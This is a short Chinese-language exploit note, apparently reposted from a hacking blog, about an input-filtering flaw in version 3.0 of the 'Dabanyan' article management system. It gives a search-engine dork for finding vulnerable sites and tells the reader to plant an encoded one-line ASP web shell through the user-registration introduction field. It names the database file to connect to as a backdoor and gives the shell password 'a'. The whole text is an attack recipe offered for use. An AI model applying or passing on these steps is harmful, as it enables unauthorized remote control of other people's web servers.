大榕树网络文章管理系统Ver 3.0 Build 090602用户注册处过滤不严,可插入一句话
利用:
Google:inurl:ArtClaShow.asp?cid
打开网页,找到注册新用户,或者直接跳到UserReg.asp页面,
在用户介绍处插入一句话 ┼攠數畣整爠煥敵瑳∨≡┩愾 ,其他按要求输入
如果看到注册成功,等待管理员审核,不用管,连接数据库即可.貌似现在流行这样插.
密码a,数据库地址:data/admin_article.asp
转自:http://www.virusest.com/post/53.html